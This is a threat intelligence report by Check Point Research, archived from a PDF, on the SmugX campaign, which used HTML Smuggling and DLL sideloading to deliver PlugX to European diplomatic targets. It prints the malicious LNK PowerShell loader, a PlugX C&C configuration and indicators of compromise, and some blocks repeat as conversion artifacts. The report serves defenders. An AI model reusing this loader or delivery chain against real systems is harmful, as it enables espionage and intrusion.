Chinese Threat Actors Targeting Europe in SmugX Campaign
By etal
Published: 2023-07-03 · Archived: 2026-04-19 02:00:25 UTC
Introduction
In the last couple of months, Check Point Research (CPR) has been tracking the activity of a Chinese threat actor
targeting Foreign Affairs ministries and embassies in Europe. Combined with other Chinese activity previously
reported by Check Point Research, this represents a larger trend within the Chinese ecosystem, pointing to a shift
to targeting European entities, with a focus on their foreign policy.
The activity described in this report, utilizes HTML Smuggling to target governmental entities in Eastern Europe.
This specific campaign has been active since at least December 2022, and is likely a direct continuation of a
previously reported campaign attributed to RedDelta (and also to Mustang Panda, to some extent).
The campaign uses new delivery methods to deploy (most notably – HTML Smuggling) a new variant of PlugX,
an implant commonly associated with a wide variety of Chinese threat actors. Although the payload itself remains
similar to the one found in older PlugX variants, its delivery methods results in low detection rates, which until
recently helped the campaign fly under the radar.
Key findings:
Check Point Research uncovers a targeted campaign carried out by a Chinese threat actor targeting
government entities in Europe, with a focus on foreign and domestic policy entities.
The campaign leverages HTML Smuggling, a technique in which attackers hide malicious payloads inside
HTML documents.
Following a complex infection chain involving either archives or MSI files, the attacks deploy PlugX, an
implant commonly associated with Chinese threat actors.
The campaign, called SmugX, overlaps with previously reported activity by Chinese APT
actors RedDelta and Mustang Panda. Although those two correlate to some extent with Camaro Dragon,
there is insufficient evidence to link the SmugX campaign to the Camaro Dragon group.
HTML Smuggling 101
Let’s start with a short overview of HTML Smuggling, a well-documented technique associated with cyber
criminals and state-sponsored actors alike. Malicious files are embedded within HTML documents, enabling them
to evade network-based detection measures.
The way HTML Smuggling is utilized in the SmugX campaign results in the download of either a JavaScript or a
ZIP file. Opening those malicious HTML documents results in the following chain of events:
https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/
Page 1 of 10

1. The embedded payload within the code is decoded and saved to a JavaScript blob, specifying the
appropriate file type such as  application/zip .
2. Instead of utilizing the HTML  <a>  element, the JavaScript code dynamically creates it.
3. A URL object is created from the blob using the  createObjectURL  function.
4. The  download  attribute is set with the desired filename.
5. Finally, the code invokes the click action, which simulates a user clicking on the link, and initiates the file
download.
6. For older browser versions, the code employs  msSaveOrOpenBlob  to save the blob with the desired
filename.
Figure 1 - The obfuscated HTML Smuggling implementation.
Figure 1 – The obfuscated HTML Smuggling implementation.
Lures & Targets
The lure themes are heavily focused on European domestic and foreign policies and were used to target mostly
governmental ministries in Eastern Europe.
Figure 2 - SmugX campaign targets and lures.
Figure 2 – SmugX campaign targets and lures.
The majority of the documents contained diplomatic-related content. In more than one case, the content was
directly related to China.
The lures uploaded to VirusTotal include:
A letter originating from the Serbian embassy in Budapest.
A document stating the priorities of the Swedish Presidency of the Council of the European Union.
An invitation to a diplomatic conference issued by Hungary’s Ministry of Foreign Affairs.
An article about two Chinese human rights lawyers sentenced to more than a decade in prison.
In addition, the names of the archived files themselves strongly suggest that the intended victims were diplomats
and government entities. Here are a few examples of the names we identified:
Draft Prague Process Action Plan_SOM_EN
2262_3_PrepCom_Proposal_next_meeting_26_April
Comments FRANCE – EU-CELAC Summit – May 4
202305 Indicative Planning RELEX
China jails two human rights lawyers for subversion
Figure 3 - Some of the lures used in this campaign.
Figure 3 – Some of the lures used in this campaign.
Reconnaissance
https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/
Page 2 of 10

During our research, we came across a document named China Tries to Block Prominent Uyghur Speaker at
UN.docx , which was uploaded to VirusTotal. This document employs remote image technique to access the
URL https://www.jcswcd[.]com/?wd=cqyahznz , containing a single pixel image which is not apparent to the
user. This technique, called pixel tracking, is commonly used as a reconnaissance tool. As the remote image is
requested, the attackers’ server logs the request, capturing information such as the IP address, user agent, and
sometimes the time of access. By analyzing the collected data, the attackers can gather information about the
recipient’s behavior, such as when and where the document was accessed.
Figure 4 - Reconnaissance file.

Infection chains
Figure 4 – Reconnaissance file.
Infection Chains
Figure 5 - Overview of the PlugX infection chains.
Figure 5 – Overview of the PlugX infection chains.
There are two main infection chains, both of which originate from an HTML file that saves the second stage to the
Download folder according to the victim’s browser settings. The second stage can vary, with one chain using a ZIP
file that contains a malicious LNK file, and the other chain utilizes JavaScript to download an MSI file from a
remote server.
SmugX Archive Chain
In the first scenario, the HTML smuggles a ZIP archive that contains a malicious LNK file that runs PowerShell.
The PowerShell extracts a compressed archive embedded within the lnk file and saves it to the %temp% directory.
The archive, named tmp.zip or tmp.zip , contains three files:
1. A legitimate executable used to sideload the payload
(either robotaskbaricon.exe or passwordgenerator.exe ).
2. The malicious sideloaded DLL RoboForm.dll .
3. The PlugX payload data.dat .
ⓘ The vulnerability in RoboForm was addressed by the company starting Version 9.3.7 for Windows,
which was released on November 1, 2022.
The PowerShell then continues to run the hijacked software, triggering the execution of the PlugX payload stored
in data.dat .
Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
$obf_lnkpath = Get - ChildItem * .lnk | where - object {$_.length - eq 00824235}
https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/
Page 3 of 10

| Select - Object - ExpandProperty FullName;
$obf_file = [system.io.file]::ReadAllBytes($obf_lnkpath);
$obf_path = 'C:\Users\User\AppData\Local\Temp\tmp.zip';
$obf_path = [Environment]::ExpandEnvironmentVariables($obf_path);
$obf_dir = [System.IO.Path]::GetDirectoryName($obf_path);
[System.IO.File]::WriteAllBytes($obf_path, $obf_file[008192..($obf_file.length)]);
cd $obf_dir;
Expand - Archive - Path $obf_path - DestinationPath . - EA SilentlyContinue - Force | Out - Null;
Remove - Item - Path $obf_path - EA SilentlyContinue - Force | Out - Null;
& .\passwordgenerator.exe
$obf_lnkpath = Get - ChildItem * .lnk | where - object {$_.length - eq 00824235} | Select - Object -
ExpandProperty FullName; $obf_file = [system.io.file]::ReadAllBytes($obf_lnkpath); $obf_path =
'C:\Users\User\AppData\Local\Temp\tmp.zip'; $obf_path =
[Environment]::ExpandEnvironmentVariables($obf_path); $obf_dir =
[System.IO.Path]::GetDirectoryName($obf_path); [System.IO.File]::WriteAllBytes($obf_path, $obf_file[008192..
($obf_file.length)]); cd $obf_dir; Expand - Archive - Path $obf_path - DestinationPath . - EA SilentlyContinue -
Force | Out - Null; Remove - Item - Path $obf_path - EA SilentlyContinue - Force | Out - Null; &
.\passwordgenerator.exe
$obf_lnkpath = Get - ChildItem * .lnk | where - object {$_.length - eq 00824235}
| Select - Object - ExpandProperty FullName;
$obf_file = [system.io.file]::ReadAllBytes($obf_lnkpath);
$obf_path = 'C:\Users\User\AppData\Local\Temp\tmp.zip';
$obf_path = [Environment]::ExpandEnvironmentVariables($obf_path);
$obf_dir = [System.IO.Path]::GetDirectoryName($obf_path);
[System.IO.File]::WriteAllBytes($obf_path, $obf_file[008192..($obf_file.length)]);
cd $obf_dir;
Expand - Archive - Path $obf_path - DestinationPath . - EA SilentlyContinue - Force | Out - Null
Remove - Item - Path $obf_path - EA SilentlyContinue - Force | Out - Null;
& .\passwordgenerator.exe
SmugX JavaScript Chain
The second scenario utilizes HTML Smuggling to download a JavaScript file. When this file is executed, it
downloads and executes an MSI file from the attackers’ server. The MSI creates a new folder within
the  %appdata%\Local  directory, in which the three files extracted from the MSI package are stored. The dropped
files consist of a hijacked legitimate executable, the loader DLL, and the encrypted payload, as described above.
https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/
Page 4 of 10

Loader
As observed in past instances, PlugX malware employs DLL sideloading techniques. After the lnk or MSI file
drops the necessary files, it triggers the execution of a legitimate program, which in turn loads the malicious DLL.
The DLL is responsible for decrypting the final payload, which is often stored in a file named  data.dat  using
RC4 encryption.
The decryption process utilizes a hardcoded key that varies across different versions of the malware. Once
decrypted, the payload is loaded into memory for further execution.
Figure 6 - The loader Loads and decrypts the payload in memory using the highlighted key.
Figure 6 – The loader Loads and decrypts the payload in memory using the highlighted key.
PlugX Malware
The final payload is PlugX malware, which has been utilized by multiple Chinese threat actors since 2008. It
operates as a remote access tool (RAT) and employs a modular structure which enables it to accommodate diverse
plugins with distinct functionalities. This enables the attackers to carry out a range of malicious activities on
compromised systems, including file theft, screen captures, keystroke logging, and command execution.
To ensure persistence, the PlugX payload copies the legitimate program and the DLL and stores them within a
hidden directory it creates. The encrypted payload is stored in a separate hidden folder. The malware achieves
persistence by adding the legitimate program to the  Run  registry key.
Figure 7 - RoboForm Update key added for persistence.
Figure 7 – RoboForm Update key added for persistence.
Some of the PlugX payloads we found write a deceptive lure in the form of a PDF file to the  %temp%  directory
and then open it. The document path is stored within the PlugX configuration under  document_name . It is worth
mentioning that only a few samples within this campaign included the  document_name  field; it was missing in the
majority of the samples.
Following the initial execution which sets the persistence and copies the malware files to its target directories, the
malware executes itself once again. This time it includes a parameter indicating that it should exclusively carry out
communication with the C&C (Command and Control) server. One notable change we saw in this campaign’s
samples is the increasing use of the RC4 encryption method compared to the simple XOR decryption we have
seen in the past. The encrypted config still resides in the data section, but it has the key prepended at the start of
the config and not in the decryption function like in previous samples.
Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/
Page 5 of 10

{
"str_one": "",
"str_two": "TwGd6YGGI",
"campaign_id": "test3",
"document_name": "202305 Indicative Planning RELEX.pdf",
"ips": [
{
"ip": "62.233.57.136",
"port": 443,
"is_https": 1
},
{
"ip": "62.233.57.136",
"port": 443,
"is_https": 1
},
{
"ip": "62.233.57.136",
"port": 443,
"is_https": 1
}
]
}
{ "str_one": "", "str_two": "TwGd6YGGI", "campaign_id": "test3", "document_name": "202305 Indicative
Planning RELEX.pdf", "ips": [ { "ip": "62.233.57.136", "port": 443, "is_https": 1 }, { "ip": "62.233.57.136",
"port": 443, "is_https": 1 }, { "ip": "62.233.57.136", "port": 443, "is_https": 1 } ] }
https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/
Page 6 of 10

{
 "str_one": "",
 "str_two": "TwGd6YGGI",
 "campaign_id": "test3",
 "document_name": "202305 Indicative Planning RELEX.pdf",
 "ips": [
 {
 "ip": "62.233.57.136",
 "port": 443,
 "is_https": 1
 },
 {
 "ip": "62.233.57.136",
 "port": 443,
 "is_https": 1
 },
 {
 "ip": "62.233.57.136",
 "port": 443,
 "is_https": 1
 }
 ]
}
During the course of our investigating the samples, the threat actor dispatched a batch script, sent from the C&C
server, intended to erase any trace of their activities. This script, named  del_RoboTask Update.bat , eradicates the
legitimate executable, the PlugX loader DLL, and the registry key implemented for persistence, and ultimately
deletes itself. It is likely this is the result of the threat actors becoming aware they were under scrutiny.
Attribution
This campaign shares significant similarities with activity attributed by other security vendors to either RedDelta
or Mustang Panda (In this context it is worth noting that RedDelta and Mustang Panda are correlated to some
extent, and in some cases are used to describe same activity):
Infrastructure – During our research, we found a distinctive certificate on the C&C server with the IP
address  62.233.57[.]136 . Notably, the common name within this certificate points to another IP
address,  45.134.83[.]29 , an indictor previously associated with RedDelta.
It is worth mentioning that the same certificate was referenced in other research about Mustang Panda,
further solidifying the link between SmugX and previously observed activities.
Figure 8 - The certificate found on the C&C server.
Figure 8 – The certificate found on the C&C server.
https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/
Page 7 of 10

Paths – Some of the paths used to deploy PlugX are unique and were observed in the campaigns described
above. The unique paths we observed include:
C:\Users\Public\VirtualFile
C:\Users\Public\SamsungDriver
C:\Users\Public\SecurityScan
Targeting – In addition to technical evidence, the victimology and lure tactics employed in the SmugX
campaign are highly correlated to those described in RedDelta and Mustang Panda reports by other
vendors.
We recently published a set of articles about a threat actor we’ve been tracking named Camaro Dragon, whose
activity overlaps with Mustang Panda and RedDelta. However, there is insufficient evidence to link this current
campaign directly to Camaro Dragon and are therefore tracking it as the SmugX campaign.
Conclusion
In this report, we analyzed a recent campaign which correlates to RedDelta activities, and overlaps to some degree
with Mustang Panda, highlighting their persistent targeting of European government entities. We identified
multiple infection chains that employ the HTML Smuggling technique which leads to the deployment of the
PlugX payload. The campaign, called SmugX, is part of a larger trend we’re seeing of Chinese threat actors
shifting their focus to Europe.
While none of the techniques observed in this campaign is new or unique, the combination of the different tactics,
and the variety of infection chains resulting in low detection rates, enabled the threat actors to stay under the radar
for quite a while. As for PlugX, it also remained largely unchanged from previous appearances, although one new
aspect observed is the adoption of RC4 encryption of the payload, which is a departure from the previously
utilized XOR encryption.
Check Point Software Customers remain protected against the threat described in
this research.
Check Point Threat Emulation and Harmony Endpoint provide comprehensive coverage of attack tactics, file-types, and operating systems and is protecting against the type of attacks and threats described in this report.
Check Point Threat Emulation:
APT.Wins.MustangPanda.AP
Harmony Endpoint:
APT.Win.PlugX.O
APT.Win.PlugX.Q
APT.Win.PlugX.R
IOCs
https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/
Page 8 of 10

Hashes
HTML
edb5d4b454b6c7d3abecd6de7099e05575b8f28bb09dfc364e45ce8c16a34fcd
736451c2593bc1601c52b45c16ad8fd1aec56f868eb3bba333183723dea805af
0e4b81e04ca77762be2afb8bd451abb2ff46d2831028cde1c5d0ec45199f01a1
989ede1df02e4d9620f6caf75a88a11791d156f62fdea4258e12d972df76bc05
10cad59ea2a566597d933b1e8ba929af0b4c7af85481eacaab708ef4ddf6e0ee
c96723a68fc939c835578ff746f7d4c5371cb82a9c0dffe360bb656acea4d6e1
9ce5abd02d397689d99f62dfbd2a6a396876c6629cb5db453f1dcbbc3465ac9a
Archives
5f751fb287db51f79bb6df2e330a53b6d80ef3d2af93f09bb786b62e613514db
baca1159acc715545a787d522950117eae5b7dc65efacfe86383f62e6b9b59d3
720a70ca6ee1fbaf06c7cb60d14e27391130407e34e13a092d19f1df2c9c6d05
460c459db77c5625ed1c029b2dd6c6eae5e631b81a169494fb0182d550769f76
277390cc50e00f52e76a6562e6e699b0345497bd1df26c7c41bd56da5b6d1347
JavaScripts
3c6ace055527877778d989f469a5a70eb5ef7700375b850f0b1b8414151105ee
27a61653ce4e503334413cf80809647ce5dca02ff4aea63fb3a39bc62c9c258c
ce308b538ff3a0be0dbcee753db7e556a54b4aeddbddd0c03db7126b08911fe2
MSI
fd0711a50c8af1dbc5c7ba42b894b2af8a2b03dd7544d20f5a887c93b9834429
3489955d23e66d6f34b3ada70b4d228547dbb3ccb0f6c7282553cbbdeaf168cb
04b99518502774deb4a9d9cf6b54d43ff8f333d8ec5b4b230c0e995542bb2c61
bd3881964e351a7691bfc7e997e8a2c8ce4a8e26b79e3712d0cbdc484a5646b6
ea2869424df2ffbb113017d95ae48ae8ed9897280fd21b26e046c75b3e43b25a
RoboForm.dll
b00c252a60171f33e32e64891ffe826b8a45f8816acf778838d788897213a405
2bc30ced135acd6a506cfb557734407f21b70fecd2f645c5b938e14199b24f1e
0d13a503d86a6450f71408eb82a196718324465744bf6b8c4e0a780fd5be40c0
0bdfb922a39103658195d1d37ff584d24f7bd88464e7a119e86d6e3579958cc1
a0879dd439c7f1ed520aad0c309fe1dbf1a2fc41e2468f4174489a0ec56c47c7
bddbc529f23ab6b865bc750508403ef57c8cf77284d613d030949bd37078d880
4547914e17c127d9b53bbc9d44de0e5b867f1a86d2e5ede828cd3188ed7fe838
0032d5430f1b5fcfb6a380b4f1d226b6b919f2677340503f04df04235409b2d0
Encrypted payload
https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/
Page 9 of 10

62c2e246855d589eb1ec37a9f3bcc0b6f3ba9946532aff8a39a4dc9d3a93f42c
f7d35cb95256513c07c262d4b03603e073e58eb4cd5fa9aac1e04ecc6e870d42
bf4f8a5f75e9e5ecd752baa73abddd37b014728722ac3d74b82bffa625bf09b5
8a6ef9aa3f0762b03f983a1e53e8c731247273aafa410ed884ecd4c4e02c7db8
ec3e491a831b4057fc0e2ebe9f43c32f1f07959b6430b323d35d6d409d2b31e4
bf8e512921522e49d16c638dc8d01bd0a2803a4ef019afbfc2f0941875019ea1
ba55542c6fa12865633d6d24f4a81bffd512791a6e0a9b77f6b17a53e2216659
Decrypted payload
8ea34b85dd4fb64f7e6591e4f1c24763fc3421caa7c0f0d8350c67b9bafa4d32
8cac6dfb2a894ff3f530c29e79dcd37810b4628279b9570a34f7e22bd4d416b3
ea5825fa1f39587a88882e87064caae9dd3b79f02438dc3a229c5b775b530c7d
1acb061ce63ee8ee172fbdf518bd261ef2c46d818ffd4b1614db6ce3daa5a885
08661f40f40371fc8a49380ad3d57521f9d0c2aa322ae4b0a684b27e637aed12
324bfb2f414be221e24aaa9fb22cb49e4d4c0904bd7c203afdff158ba63fe35b
IPs & domains
45.90.58[.]69
62.233.57[.]136
217.12.207[.]164
152.152.12[.]12
jcswcd[.]com
newsmailnet[.]com
Paths
C:\Users\<username>\VirtualFile
C:\Users\Public\VirtualFile
C:\Users\<username>\SamsungDriver
C:\Users\Public\SamsungDriver
C:\Users\Public\SecurityScan
Source: https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/
https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/
Page 10 of 10

] }     
{ "str_one": "", "str_two": "TwGd6YGGI", "campaign_id": "test3", "document_name": "202305 Indicative
Planning RELEX.pdf", "ips": [ { "ip": "62.233.57.136", "port": 443, "is_https": 1 }, { "ip": "62.233.57.136",
"port": 443, "is_https": 1 }, { "ip": "62.233.57.136", "port": 443, "is_https": 1 } ] }
   Page 6 of 10